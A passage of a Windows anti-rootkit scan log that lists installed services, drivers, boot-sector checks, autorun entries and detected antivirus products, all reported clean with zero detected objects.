14:17:54.0028 0x1220 nvraid - ok 14:17:54.0038 0x1220 nvstor - ok 14:17:54.0038 0x1220 nvsvc - ok 14:17:54.0048 0x1220 nv_agp - ok 14:17:54.0048 0x1220 ohci1394 - ok 14:17:54.0058 0x1220 ose - ok 14:17:54.0058 0x1220 p2pimsvc - ok 14:17:54.0068 0x1220 p2psvc - ok 14:17:54.0068 0x1220 Parport - ok 14:17:54.0078 0x1220 partmgr - ok 14:17:54.0078 0x1220 Parvdm - ok 14:17:54.0088 0x1220 PcaSvc - ok 14:17:54.0088 0x1220 pci - ok 14:17:54.0098 0x1220 pciide - ok 14:17:54.0098 0x1220 pcmcia - ok 14:17:54.0108 0x1220 pcw - ok 14:17:54.0108 0x1220 PDF Architect 2 Creator - ok 14:17:54.0118 0x1220 PEAUTH - ok 14:17:54.0138 0x1220 PGPdisk - ok 14:17:54.0138 0x1220 pgpfs - ok 14:17:54.0148 0x1220 PGPsdkDriver - ok 14:17:54.0148 0x1220 PGPserv - ok 14:17:54.0158 0x1220 PGPwded - ok 14:17:54.0158 0x1220 Pgpwdefs - ok 14:17:54.0168 0x1220 pla - ok 14:17:54.0168 0x1220 Platinum Host Service - ok 14:17:54.0178 0x1220 PlugPlay - ok 14:17:54.0178 0x1220 PNRPAutoReg - ok 14:17:54.0188 0x1220 PNRPsvc - ok 14:17:54.0188 0x1220 
PolicyAgent - ok 14:17:54.0198 0x1220 Power - ok 14:17:54.0208 0x1220 PptpMiniport - ok 14:17:54.0208 0x1220 Processor - ok 14:17:54.0218 0x1220 ProfSvc - ok 14:17:54.0218 0x1220 ProtectedStorage - ok 14:17:54.0228 0x1220 Psched - ok 14:17:54.0228 0x1220 ql2300 - ok 14:17:54.0238 0x1220 ql40xx - ok 14:17:54.0238 0x1220 QWAVE - ok 14:17:54.0248 0x1220 QWAVEdrv - ok 14:17:54.0248 0x1220 RasAcd - ok 14:17:54.0258 0x1220 RasAgileVpn - ok 14:17:54.0258 0x1220 RasAuto - ok 14:17:54.0268 0x1220 Rasl2tp - ok 14:17:54.0268 0x1220 RasMan - ok 14:17:54.0278 0x1220 RasPppoe - ok 14:17:54.0278 0x1220 RasSstp - ok 14:17:54.0288 0x1220 rdbss - ok 14:17:54.0288 0x1220 rdpbus - ok 14:17:54.0298 0x1220 RDPCDD - ok 14:17:54.0298 0x1220 RDPENCDD - ok 14:17:54.0308 0x1220 RDPREFMP - ok 14:17:54.0318 0x1220 RdpVideoMiniport - ok 14:17:54.0318 0x1220 RDPWD - ok 14:17:54.0328 0x1220 rdyboost - ok 14:17:54.0328 0x1220 RemoteAccess - ok 14:17:54.0338 0x1220 RemoteRegistry - ok 14:17:54.0338 0x1220 RichVideo - ok 14:17:54.0348 0x1220 rpcapd - ok 14:17:54.0348 0x1220 RpcEptMapper - ok 14:17:54.0358 0x1220 RpcLocator - ok 14:17:54.0358 0x1220 RpcSs - ok 14:17:54.0368 0x1220 rspndr - ok 14:17:54.0368 0x1220 SamSs - ok 14:17:54.0378 0x1220 sbp2port - ok 14:17:54.0378 0x1220 SCardSvr - ok 14:17:54.0388 0x1220 scfilter - ok 14:17:54.0388 0x1220 Schedule - ok 14:17:54.0398 0x1220 SCPolicySvc - ok 14:17:54.0398 0x1220 SDRSVC - ok 14:17:54.0408 0x1220 secdrv - ok 14:17:54.0418 0x1220 seclogon - ok 14:17:54.0418 0x1220 SENS - ok 14:17:54.0428 0x1220 SensrSvc - ok 14:17:54.0428 0x1220 Serenum - ok 14:17:54.0438 0x1220 Serial - ok 14:17:54.0438 0x1220 sermouse - ok 14:17:54.0448 0x1220 SessionEnv - ok 14:17:54.0458 0x1220 sffdisk - ok 14:17:54.0458 0x1220 sffp_mmc - ok 14:17:54.0468 0x1220 sffp_sd - ok 14:17:54.0468 0x1220 sfloppy - ok 14:17:54.0478 0x1220 SharedAccess - ok 14:17:54.0478 0x1220 ShellHWDetection - ok 14:17:54.0488 0x1220 sisagp - ok 14:17:54.0488 0x1220 SiSRaid2 - ok 14:17:54.0498 0x1220 
SiSRaid4 - ok 14:17:54.0498 0x1220 Smb - ok 14:17:54.0508 0x1220 SNMPTRAP - ok 14:17:54.0518 0x1220 spldr - ok 14:17:54.0518 0x1220 Spooler - ok 14:17:54.0528 0x1220 sppsvc - ok 14:17:54.0528 0x1220 sppuinotify - ok 14:17:54.0538 0x1220 srv - ok 14:17:54.0538 0x1220 srv2 - ok 14:17:54.0548 0x1220 srvnet - ok 14:17:54.0548 0x1220 SSDPSRV - ok 14:17:54.0558 0x1220 ssmdrv - ok 14:17:54.0558 0x1220 SstpSvc - ok 14:17:54.0568 0x1220 Stereo Service - ok 14:17:54.0568 0x1220 stexstor - ok 14:17:54.0578 0x1220 StillCam - ok 14:17:54.0578 0x1220 StiSvc - ok 14:17:54.0588 0x1220 swenum - ok 14:17:54.0588 0x1220 swprv - ok 14:17:54.0598 0x1220 SysMain - ok 14:17:54.0598 0x1220 TabletInputService - ok 14:17:54.0608 0x1220 TapiSrv - ok 14:17:54.0608 0x1220 TBS - ok 14:17:54.0618 0x1220 Tcpip - ok 14:17:54.0618 0x1220 TCPIP6 - ok 14:17:54.0628 0x1220 tcpipreg - ok 14:17:54.0638 0x1220 TDPIPE - ok 14:17:54.0638 0x1220 TDTCP - ok 14:17:54.0648 0x1220 tdx - ok 14:17:54.0648 0x1220 TeamViewer - ok 14:17:54.0658 0x1220 TermDD - ok 14:17:54.0658 0x1220 TermService - ok 14:17:54.0668 0x1220 Themes - ok 14:17:54.0668 0x1220 THREADORDER - ok 14:17:54.0678 0x1220 tmactmon - ok 14:17:54.0688 0x1220 tmcomm - ok 14:17:54.0688 0x1220 TMEBC - ok 14:17:54.0698 0x1220 tmeevw - ok 14:17:54.0698 0x1220 tmevtmgr - ok 14:17:54.0708 0x1220 tmnciesc - ok 14:17:54.0708 0x1220 tmusa - ok 14:17:54.0718 0x1220 TrkWks - ok 14:17:54.0718 0x1220 truecrypt - ok 14:17:54.0728 0x1220 TrustedInstaller - ok 14:17:54.0738 0x1220 tssecsrv - ok 14:17:54.0738 0x1220 TsUsbFlt - ok 14:17:54.0738 0x1220 TsUsbGD - ok 14:17:54.0748 0x1220 tunnel - ok 14:17:54.0748 0x1220 uagp35 - ok 14:17:54.0758 0x1220 udfs - ok 14:17:54.0768 0x1220 UI0Detect - ok 14:17:54.0768 0x1220 uliagpkx - ok 14:17:54.0778 0x1220 umbus - ok 14:17:54.0778 0x1220 UmPass - ok 14:17:54.0788 0x1220 upnphost - ok 14:17:54.0788 0x1220 USBAAPL - ok 14:17:54.0798 0x1220 usbccgp - ok 14:17:54.0798 0x1220 usbcir - ok 14:17:54.0808 0x1220 usbehci - ok 
14:17:54.0808 0x1220 usbhub - ok 14:17:54.0818 0x1220 usbohci - ok 14:17:54.0818 0x1220 usbprint - ok 14:17:54.0828 0x1220 usbser - ok 14:17:54.0828 0x1220 USBSTOR - ok 14:17:54.0838 0x1220 usbuhci - ok 14:17:54.0838 0x1220 UxSms - ok 14:17:54.0848 0x1220 VaultSvc - ok 14:17:54.0848 0x1220 vdrvroot - ok 14:17:54.0858 0x1220 vds - ok 14:17:54.0858 0x1220 vga - ok 14:17:54.0868 0x1220 VgaSave - ok 14:17:54.0868 0x1220 vhdmp - ok 14:17:54.0878 0x1220 viaagp - ok 14:17:54.0878 0x1220 ViaC7 - ok 14:17:54.0888 0x1220 viaide - ok 14:17:54.0888 0x1220 volmgr - ok 14:17:54.0898 0x1220 volmgrx - ok 14:17:54.0898 0x1220 volsnap - ok 14:17:54.0908 0x1220 vsmraid - ok 14:17:54.0908 0x1220 VSS - ok 14:17:54.0918 0x1220 vwifibus - ok 14:17:54.0928 0x1220 W32Time - ok 14:17:54.0928 0x1220 WacomPen - ok 14:17:54.0938 0x1220 WANARP - ok 14:17:54.0938 0x1220 Wanarpv6 - ok 14:17:54.0948 0x1220 wbengine - ok 14:17:54.0948 0x1220 WbioSrvc - ok 14:17:54.0958 0x1220 wcncsvc - ok 14:17:54.0958 0x1220 WcsPlugInService - ok 14:17:54.0968 0x1220 Wd - ok 14:17:54.0968 0x1220 Wdf01000 - ok 14:17:54.0978 0x1220 WdiServiceHost - ok 14:17:54.0978 0x1220 WdiSystemHost - ok 14:17:54.0988 0x1220 WebClient - ok 14:17:54.0988 0x1220 Wecsvc - ok 14:17:54.0998 0x1220 wercplsupport - ok 14:17:54.0998 0x1220 WerSvc - ok 14:17:55.0008 0x1220 WfpLwf - ok 14:17:55.0008 0x1220 WIMMount - ok 14:17:55.0018 0x1220 WinDefend - ok 14:17:55.0028 0x1220 WinHttpAutoProxySvc - ok 14:17:55.0028 0x1220 Winmgmt - ok 14:17:55.0038 0x1220 WinRM - ok 14:17:55.0038 0x1220 WinUsb - ok 14:17:55.0048 0x1220 Wlansvc - ok 14:17:55.0058 0x1220 WmiAcpi - ok 14:17:55.0058 0x1220 wmiApSrv - ok 14:17:55.0068 0x1220 WMPNetworkSvc - ok 14:17:55.0068 0x1220 WPCSvc - ok 14:17:55.0078 0x1220 WPDBusEnum - ok 14:17:55.0078 0x1220 ws2ifsl - ok 14:17:55.0088 0x1220 wscsvc - ok 14:17:55.0088 0x1220 WSearch - ok 14:17:55.0098 0x1220 wuauserv - ok 14:17:55.0108 0x1220 WudfPf - ok 14:17:55.0108 0x1220 WUDFRd - ok 14:17:55.0108 0x1220 wudfsvc - ok 
14:17:55.0118 0x1220 WwanSvc - ok 14:17:55.0128 0x1220 ================ Scan global =============================== 14:17:55.0128 0x1220 [ Global ] - ok 14:17:55.0128 0x1220 ================ Scan MBR ================================== 14:17:55.0128 0x1220 [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0 14:17:55.0148 0x1220 \Device\Harddisk0\DR0 - ok 14:17:55.0188 0x1220 [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1 14:17:55.0228 0x1220 \Device\Harddisk1\DR1 - ok 14:17:55.0228 0x1220 ================ Scan VBR ================================== 14:17:55.0238 0x1220 [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1 14:17:55.0238 0x1220 \Device\Harddisk0\DR0\Partition1 - ok 14:17:55.0238 0x1220 [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2 14:17:55.0238 0x1220 \Device\Harddisk0\DR0\Partition2 - ok 14:17:55.0238 0x1220 [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1 14:17:55.0248 0x1220 \Device\Harddisk1\DR1\Partition1 - ok 14:17:55.0248 0x1220 ================ Scan generic autorun ====================== 14:17:55.0248 0x1220 RtHDVCpl - ok 14:17:55.0248 0x1220 Skytel - ok 14:17:55.0248 0x1220 PCMService - ok 14:17:55.0248 0x1220 CanonMyPrinter - ok 14:17:55.0258 0x1220 NvBackend - ok 14:17:55.0258 0x1220 Trend Micro Client Framework - ok 14:17:55.0258 0x1220 Platinum - ok 14:17:55.0258 0x1220 avgnt - ok 14:17:55.0268 0x1220 Avira Systray - ok 14:17:55.0268 0x1220 Sidebar - ok 14:17:55.0268 0x1220 mctadmin - ok 14:17:55.0268 0x1220 Sidebar - ok 14:17:55.0268 0x1220 mctadmin - ok 14:17:55.0278 0x1220 IncrediMail - ok 14:17:55.0338 0x1220 AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated ) 14:17:55.0338 0x1220 AV detected via SS2: Trend Micro Internet Security, C:\Program Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated ) 14:17:55.0348 0x1220 Win FW state via NFP2: 
enabled 14:17:57.0799 0x1220 ============================================================ 14:17:57.0799 0x1220 Scan finished 14:17:57.0799 0x1220 ============================================================ 14:17:57.0799 0x1ad8 Detected object count: 0 14:17:57.0799 0x1ad8 Actual detected object count: 0 14:21:19.0727 0x1464 ============================================================ 14:21:19.0727 0x1464 Scan started 14:21:19.0727 0x1464 Mode: Manual; SigCheck; TDLFS; 14:21:19.0727 0x1464 ============================================================ 14:21:19.0727 0x1464 KSN ping started 14:21:33.0068 0x1464 KSN ping finished: true 14:21:33.0228 0x1464 ================ Scan system memory ======================== 14:21:33.0228 0x1464 System memory - ok 14:21:33.0228 0x1464 ================ Scan services ============================= 14:21:33.0248 0x1464 1394ohci - ok 14:21:33.0248 0x1464 ACPI - ok 14:21:33.0258 0x1464 AcpiPmi - ok 14:21:33.0258 0x1464 Adobe LM Service - ok 14:21:33.0268 0x1464 AdobeARMservice - ok 14:21:33.0268 0x1464 AdobeFlashPlayerUpdateSvc - ok 14:21:33.0278 0x1464 adp94xx - ok 14:21:33.0278 0x1464 adpahci - ok 14:21:33.0288 0x1464 adpu320 - ok 14:21:33.0288 0x1464 AeLookupSvc - ok 14:21:33.0298 0x1464 AFD - ok 14:21:33.0298 0x1464 agp440 - ok 14:21:33.0308 0x1464 aic78xx - ok 14:21:33.0308 0x1464 ALG - ok 14:21:33.0318 0x1464 aliide - ok 14:21:33.0318 0x1464 amdagp - ok 14:21:33.0328 0x1464 amdide - ok 14:21:33.0328 0x1464 AmdK8 - ok 14:21:33.0338 0x1464 AmdPPM - ok 14:21:33.0338 0x1464 amdsata - ok 14:21:33.0348 0x1464 amdsbs - ok 14:21:33.0348 0x1464 amdxata - ok 14:21:33.0358 0x1464 Amsp - ok 14:21:33.0358 0x1464 AntiVirSchedulerService - ok 14:21:33.0368 0x1464 AntiVirService - ok 14:21:33.0368 0x1464 AppID - ok 14:21:33.0378 0x1464 AppIDSvc - ok 14:21:33.0378 0x1464 Appinfo - ok 14:21:33.0388 0x1464 Apple Mobile Device - ok 14:21:33.0388 0x1464 arc - ok 14:21:33.0398 0x1464 arcsas - ok 14:21:33.0408 0x1464 aspnet_state - ok 14:21:33.0408 
0x1464 AsyncMac - ok 14:21:33.0418 0x1464 atapi - ok 14:21:33.0418 0x1464 AudioEndpointBuilder - ok 14:21:33.0428 0x1464 Audiosrv - ok 14:21:33.0428 0x1464 avgntflt - ok 14:21:33.0438 0x1464 avipbb - ok 14:21:33.0438 0x1464 Avira.OE.ServiceHost - ok 14:21:33.0448 0x1464 avkmgr - ok 14:21:33.0448 0x1464 AxInstSV - ok 14:21:33.0458 0x1464 b06bdrv - ok 14:21:33.0458 0x1464 b57nd60x - ok 14:21:33.0468 0x1464 BDESVC - ok 14:21:33.0468 0x1464 Beep - ok 14:21:33.0478 0x1464 BFE - ok 14:21:33.0478 0x1464 BITS - ok 14:21:33.0488 0x1464 blbdrive - ok 14:21:33.0488 0x1464 Bonjour Service - ok 14:21:33.0498 0x1464 bowser - ok 14:21:33.0498 0x1464 BrFiltLo - ok 14:21:33.0508 0x1464 BrFiltUp - ok 14:21:33.0508 0x1464 Browser - ok 14:21:33.0518 0x1464 Brserid - ok 14:21:33.0518 0x1464 BrSerWdm - ok 14:21:33.0528 0x1464 BrUsbMdm - ok 14:21:33.0528 0x1464 BrUsbSer - ok 14:21:33.0538 0x1464 BTHMODEM - ok 14:21:33.0538 0x1464 bthserv - ok 14:21:33.0548 0x1464 cdfs - ok 14:21:33.0548 0x1464 cdrom - ok 14:21:33.0558 0x1464 CertPropSvc - ok 14:21:33.0558 0x1464 circlass - ok 14:21:33.0568 0x1464 CLCapSvc - ok 14:21:33.0568 0x1464 CLFS - ok 14:21:33.0578 0x1464 clr_optimization_v2.0.50727_32 - ok 14:21:33.0578 0x1464 clr_optimization_v4.0.30319_32 - ok 14:21:33.0588 0x1464 CLSched - ok 14:21:33.0588 0x1464 CmBatt - ok 14:21:33.0598 0x1464 cmdide - ok 14:21:33.0598 0x1464 CNG - ok 14:21:33.0608 0x1464 Compbatt - ok 14:21:33.0608 0x1464 CompositeBus - ok 14:21:33.0618 0x1464 COMSysApp - ok 14:21:33.0628 0x1464 crcdisk - ok 14:21:33.0628 0x1464 CryptSvc - ok 14:21:33.0638 0x1464 CXAVSAUD - ok 14:21:33.0638 0x1464 DcomLaunch - ok 14:21:33.0648 0x1464 defragsvc - ok 14:21:33.0648 0x1464 DfsC - ok 14:21:33.0658 0x1464 Dhcp - ok 14:21:33.0658 0x1464 discache - ok 14:21:33.0668 0x1464 Disk - ok 14:21:33.0668 0x1464 Dnscache - ok 14:21:33.0678 0x1464 dot3svc - ok 14:21:33.0678 0x1464 DPS - ok 14:21:33.0688 0x1464 drmkaud - ok 14:21:33.0688 0x1464 DXGKrnl - ok 14:21:33.0698 0x1464 EapHost - ok 
14:21:33.0698 0x1464 ebdrv - ok 14:21:33.0708 0x1464 EFS - ok 14:21:33.0708 0x1464 ehRecvr - ok 14:21:33.0718 0x1464 ehSched - ok 14:21:33.0718 0x1464 elxstor - ok 14:21:33.0728 0x1464 ErrDev - ok 14:21:33.0738 0x1464 EventSystem - ok 14:21:33.0738 0x1464 exfat - ok 14:21:33.0748 0x1464 fastfat - ok 14:21:33.0748 0x1464 Fax - ok 14:21:33.0758 0x1464 fdc - ok 14:21:33.0758 0x1464 fdPHost - ok 14:21:33.0768 0x1464 FDResPub - ok 14:21:33.0768 0x1464 FileInfo - ok 14:21:33.0778 0x1464 Filetrace - ok 14:21:33.0778 0x1464 flpydisk - ok 14:21:33.0778 0x1464 FltMgr - ok 14:21:33.0788 0x1464 FontCache - ok 14:21:33.0798 0x1464 FontCache3.0.0.0 - ok 14:21:33.0798 0x1464 FsDepends - ok 14:21:33.0808 0x1464 Fs_Rec - ok 14:21:33.0808 0x1464 fvevol - ok 14:21:33.0818 0x1464 gagp30kx - ok 14:21:33.0818 0x1464 GEARAspiWDM - ok 14:21:33.0828 0x1464 gpsvc - ok 14:21:33.0828 0x1464 gupdate - ok 14:21:33.0838 0x1464 gupdatem - ok 14:21:33.0838 0x1464 HauppaugeTVServer - ok 14:21:33.0848 0x1464 hcw85cir - ok 14:21:33.0848 0x1464 hcw88bda - ok 14:21:33.0858 0x1464 hcw88rc5 - ok 14:21:33.0858 0x1464 HCW88TSE - ok 14:21:33.0868 0x1464 hcw88vid - ok 14:21:33.0868 0x1464 HdAudAddService - ok 14:21:33.0878 0x1464 HDAudBus - ok 14:21:33.0878 0x1464 HidBatt - ok 14:21:33.0888 0x1464 HidBth - ok 14:21:33.0888 0x1464 HidIr - ok 14:21:33.0898 0x1464 hidserv - ok 14:21:33.0898 0x1464 HidUsb - ok 14:21:33.0908 0x1464 hkmsvc - ok 14:21:33.0908 0x1464 HomeGroupListener - ok 14:21:33.0918 0x1464 HomeGroupProvider - ok 14:21:33.0918 0x1464 HpSAMD - ok 14:21:33.0928 0x1464 HTTP - ok 14:21:33.0928 0x1464 hwpolicy - ok 14:21:33.0938 0x1464 i8042prt - ok 14:21:33.0938 0x1464 iaStorV - ok 14:21:33.0948 0x1464 idsvc - ok 14:21:33.0948 0x1464 IEEtwCollectorService - ok 14:21:33.0958 0x1464 iirsp - ok 14:21:33.0958 0x1464 IKEEXT - ok 14:21:33.0968 0x1464 IntcAzAudAddService - ok 14:21:33.0978 0x1464 intelide - ok 14:21:33.0978 0x1464 intelppm - ok 14:21:33.0978 0x1464 IPBusEnum - ok 14:21:33.0988 0x1464 
IpFilterDriver - ok 14:21:33.0988 0x1464 iphlpsvc - ok 14:21:33.0998 0x1464 IPMIDRV - ok 14:21:33.0998 0x1464 IPNAT - ok 14:21:34.0008 0x1464 iPod Service - ok 14:21:34.0008 0x1464 IRENUM - ok 14:21:34.0018 0x1464 isapnp - ok 14:21:34.0018 0x1464 iScsiPrt - ok 14:21:34.0028 0x1464 kbdclass - ok 14:21:34.0028 0x1464 kbdhid - ok 14:21:34.0038 0x1464 KeyIso - ok 14:21:34.0048 0x1464 KSecDD - ok 14:21:34.0048 0x1464 KSecPkg - ok 14:21:34.0058 0x1464 KtmRm - ok 14:21:34.0058 0x1464 L1E - ok 14:21:34.0068 0x1464 LanmanServer - ok 14:21:34.0068 0x1464 LanmanWorkstation - ok 14:21:34.0078 0x1464 lltdio - ok 14:21:34.0078 0x1464 lltdsvc - ok 14:21:34.0088 0x1464 lmhosts - ok 14:21:34.0098 0x1464 LSI_FC - ok 14:21:34.0098 0x1464 LSI_SAS - ok 14:21:34.0098 0x1464 LSI_SAS2 - ok 14:21:34.0108 0x1464 LSI_SCSI - ok 14:21:34.0108 0x1464 luafv - ok 14:21:34.0118 0x1464 MBAMProtector - ok 14:21:34.0118 0x1464 MBAMScheduler - ok 14:21:34.0128 0x1464 MBAMService - ok 14:21:34.0128 0x1464 MBAMSwissArmy - ok 14:21:34.0138 0x1464 MBAMWebAccessControl - ok 14:21:34.0138 0x1464 Mcx2Svc - ok 14:21:34.0148 0x1464 megasas - ok 14:21:34.0148 0x1464 MegaSR - ok 14:21:34.0158 0x1464 MMCSS - ok 14:21:34.0158 0x1464 Modem - ok 14:21:34.0168 0x1464 monitor - ok 14:21:34.0168 0x1464 mouclass - ok 14:21:34.0178 0x1464 mouhid - ok 14:21:34.0178 0x1464 mountmgr - ok 14:21:34.0188 0x1464 MozillaMaintenance - ok 14:21:34.0188 0x1464 mpio - ok 14:21:34.0198 0x1464 mpsdrv - ok 14:21:34.0198 0x1464 MpsSvc - ok 14:21:34.0208 0x1464 MRxDAV - ok 14:21:34.0208 0x1464 mrxsmb - ok 14:21:34.0218 0x1464 mrxsmb10 - ok 14:21:34.0218 0x1464 mrxsmb20 - ok 14:21:34.0228 0x1464 msahci - ok 14:21:34.0228 0x1464 msdsm - ok 14:21:34.0238 0x1464 MSDTC - ok 14:21:34.0248 0x1464 Msfs - ok 14:21:34.0248 0x1464 mshidkmdf - ok 14:21:34.0258 0x1464 msisadrv - ok 14:21:34.0258 0x1464 MSiSCSI - ok 14:21:34.0268 0x1464 msiserver - ok 14:21:34.0268 0x1464 MSKSSRV - ok 14:21:34.0278 0x1464 MSPCLOCK - ok 14:21:34.0278 0x1464 MSPQM - ok 
14:21:34.0288 0x1464 MsRPC - ok 14:21:34.0298 0x1464 mssmbios - ok 14:21:34.0298 0x1464 MSTEE - ok 14:21:34.0298 0x1464 MTConfig - ok 14:21:34.0308 0x1464 MTsensor - ok 14:21:34.0308 0x1464 Mup - ok 14:21:34.0318 0x1464 napagent - ok 14:21:34.0318 0x1464 NativeWifiP - ok 14:21:34.0328 0x1464 NDIS - ok 14:21:34.0328 0x1464 NdisCap - ok 14:21:34.0338 0x1464 NdisTapi - ok 14:21:34.0338 0x1464 Ndisuio - ok 14:21:34.0348 0x1464 NdisWan - ok 14:21:34.0348 0x1464 NDProxy - ok 14:21:34.0358 0x1464 NetBIOS - ok 14:21:34.0358 0x1464 NetBT - ok 14:21:34.0368 0x1464 Netlogon - ok 14:21:34.0368 0x1464 Netman - ok 14:21:34.0378 0x1464 NetMsmqActivator - ok 14:21:34.0378 0x1464 NetPipeActivator - ok 14:21:34.0388 0x1464 netprofm - ok 14:21:34.0388 0x1464 NetTcpActivator - ok 14:21:34.0398 0x1464 NetTcpPortSharing - ok 14:21:34.0398 0x1464 nfrd960 - ok 14:21:34.0408 0x1464 NlaSvc - ok 14:21:34.0408 0x1464 NPF - ok 14:21:34.0418 0x1464 Npfs - ok 14:21:34.0418 0x1464 nsi - ok 14:21:34.0428 0x1464 nsiproxy - ok 14:21:34.0438 0x1464 Ntfs - ok 14:21:34.0438 0x1464 Null - ok 14:21:34.0438 0x1464 nvlddmkm - ok 14:21:34.0448 0x1464 nvraid - ok 14:21:34.0448 0x1464 nvstor - ok 14:21:34.0458 0x1464 nvsvc - ok 14:21:34.0458 0x1464 nv_agp - ok 14:21:34.0468 0x1464 ohci1394 - ok 14:21:34.0468 0x1464 ose - ok 14:21:34.0478 0x1464 p2pimsvc - ok 14:21:34.0478 0x1464 p2psvc - ok 14:21:34.0488 0x1464 Parport - ok 14:21:34.0488 0x1464 partmgr - ok 14:21:34.0498 0x1464 Parvdm - ok 14:21:34.0498 0x1464 PcaSvc - ok 14:21:34.0508 0x1464 pci - ok 14:21:34.0508 0x1464 pciide - ok 14:21:34.0518 0x1464 pcmcia - ok 14:21:34.0518 0x1464 pcw - ok 14:21:34.0528 0x1464 PDF Architect 2 Creator - ok 14:21:34.0528 0x1464 PEAUTH - ok 14:21:34.0548 0x1464 PGPdisk - ok 14:21:34.0548 0x1464 pgpfs - ok 14:21:34.0558 0x1464 PGPsdkDriver - ok 14:21:34.0558 0x1464 PGPserv - ok 14:21:34.0568 0x1464 PGPwded - ok 14:21:34.0568 0x1464 Pgpwdefs - ok 14:21:34.0578 0x1464 pla - ok 14:21:34.0578 0x1464 Platinum Host Service - ok 
14:21:34.0588 0x1464 PlugPlay - ok 14:21:34.0588 0x1464 PNRPAutoReg - ok 14:21:34.0598 0x1464 PNRPsvc - ok 14:21:34.0598 0x1464 PolicyAgent - ok 14:21:34.0608 0x1464 Power - ok 14:21:34.0618 0x1464 PptpMiniport - ok 14:21:34.0618 0x1464 Processor - ok 14:21:34.0628 0x1464 ProfSvc - ok 14:21:34.0628 0x1464 ProtectedStorage - ok 14:21:34.0628 0x1464 Psched - ok 14:21:34.0638 0x1464 ql2300 - ok 14:21:34.0638 0x1464 ql40xx - ok 14:21:34.0648 0x1464 QWAVE - ok 14:21:34.0648 0x1464 QWAVEdrv - ok 14:21:34.0658 0x1464 RasAcd - ok 14:21:34.0658 0x1464 RasAgileVpn - ok 14:21:34.0668 0x1464 RasAuto - ok 14:21:34.0668 0x1464 Rasl2tp - ok 14:21:34.0678 0x1464 RasMan - ok 14:21:34.0678 0x1464 RasPppoe - ok 14:21:34.0688 0x1464 RasSstp - ok 14:21:34.0688 0x1464 rdbss - ok 14:21:34.0698 0x1464 rdpbus - ok 14:21:34.0698 0x1464 RDPCDD - ok 14:21:34.0708 0x1464 RDPENCDD - ok 14:21:34.0718 0x1464 RDPREFMP - ok 14:21:34.0728 0x1464 RdpVideoMiniport - ok 14:21:34.0728 0x1464 RDPWD - ok 14:21:34.0728 0x1464 rdyboost - ok 14:21:34.0738 0x1464 RemoteAccess - ok 14:21:34.0738 0x1464 RemoteRegistry - ok 14:21:34.0748 0x1464 RichVideo - ok 14:21:34.0748 0x1464 rpcapd - ok 14:21:34.0758 0x1464 RpcEptMapper - ok 14:21:34.0758 0x1464 RpcLocator - ok 14:21:34.0768 0x1464 RpcSs - ok 14:21:34.0768 0x1464 rspndr - ok 14:21:34.0778 0x1464 SamSs - ok 14:21:34.0778 0x1464 sbp2port - ok 14:21:34.0788 0x1464 SCardSvr - ok 14:21:34.0788 0x1464 scfilter - ok 14:21:34.0798 0x1464 Schedule - ok 14:21:34.0798 0x1464 SCPolicySvc - ok 14:21:34.0808 0x1464 SDRSVC - ok 14:21:34.0808 0x1464 secdrv - ok 14:21:34.0818 0x1464 seclogon - ok 14:21:34.0818 0x1464 SENS - ok 14:21:34.0828 0x1464 SensrSvc - ok 14:21:34.0828 0x1464 Serenum - ok 14:21:34.0838 0x1464 Serial - ok 14:21:34.0838 0x1464 sermouse - ok 14:21:34.0848 0x1464 SessionEnv - ok 14:21:34.0858 0x1464 sffdisk - ok 14:21:34.0858 0x1464 sffp_mmc - ok 14:21:34.0868 0x1464 sffp_sd - ok 14:21:34.0868 0x1464 sfloppy - ok 14:21:34.0878 0x1464 SharedAccess - ok 
14:21:34.0878 0x1464 ShellHWDetection - ok 14:21:34.0888 0x1464 sisagp - ok 14:21:34.0888 0x1464 SiSRaid2 - ok 14:21:34.0898 0x1464 SiSRaid4 - ok 14:21:34.0898 0x1464 Smb - ok 14:21:34.0908 0x1464 SNMPTRAP - ok 14:21:34.0918 0x1464 spldr - ok 14:21:34.0918 0x1464 Spooler - ok 14:21:34.0928 0x1464 sppsvc - ok 14:21:34.0928 0x1464 sppuinotify - ok 14:21:34.0938 0x1464 srv - ok 14:21:34.0938 0x1464 srv2 - ok 14:21:34.0948 0x1464 srvnet - ok 14:21:34.0948 0x1464 SSDPSRV - ok 14:21:34.0958 0x1464 ssmdrv - ok 14:21:34.0958 0x1464 SstpSvc - ok 14:21:34.0968 0x1464 Stereo Service - ok 14:21:34.0968 0x1464 stexstor - ok 14:21:34.0978 0x1464 StillCam - ok 14:21:34.0978 0x1464 StiSvc - ok 14:21:34.0978 0x1464 swenum - ok 14:21:34.0988 0x1464 swprv - ok 14:21:34.0988 0x1464 SysMain - ok 14:21:34.0998 0x1464 TabletInputService - ok 14:21:34.0998 0x1464 TapiSrv - ok 14:21:35.0008 0x1464 TBS - ok 14:21:35.0008 0x1464 Tcpip - ok 14:21:35.0018 0x1464 TCPIP6 - ok 14:21:35.0028 0x1464 tcpipreg - ok 14:21:35.0028 0x1464 TDPIPE - ok 14:21:35.0038 0x1464 TDTCP - ok 14:21:35.0038 0x1464 tdx - ok 14:21:35.0048 0x1464 TeamViewer - ok 14:21:35.0048 0x1464 TermDD - ok 14:21:35.0058 0x1464 TermService - ok 14:21:35.0058 0x1464 Themes - ok 14:21:35.0068 0x1464 THREADORDER - ok 14:21:35.0068 0x1464 tmactmon - ok 14:21:35.0078 0x1464 tmcomm - ok 14:21:35.0088 0x1464 TMEBC - ok 14:21:35.0088 0x1464 tmeevw - ok 14:21:35.0088 0x1464 tmevtmgr - ok 14:21:35.0098 0x1464 tmnciesc - ok 14:21:35.0098 0x1464 tmusa - ok 14:21:35.0108 0x1464 TrkWks - ok 14:21:35.0108 0x1464 truecrypt - ok 14:21:35.0118 0x1464 TrustedInstaller - ok 14:21:35.0128 0x1464 tssecsrv - ok 14:21:35.0128 0x1464 TsUsbFlt - ok 14:21:35.0138 0x1464 TsUsbGD - ok 14:21:35.0138 0x1464 tunnel - ok 14:21:35.0148 0x1464 uagp35 - ok 14:21:35.0148 0x1464 udfs - ok 14:21:35.0158 0x1464 UI0Detect - ok 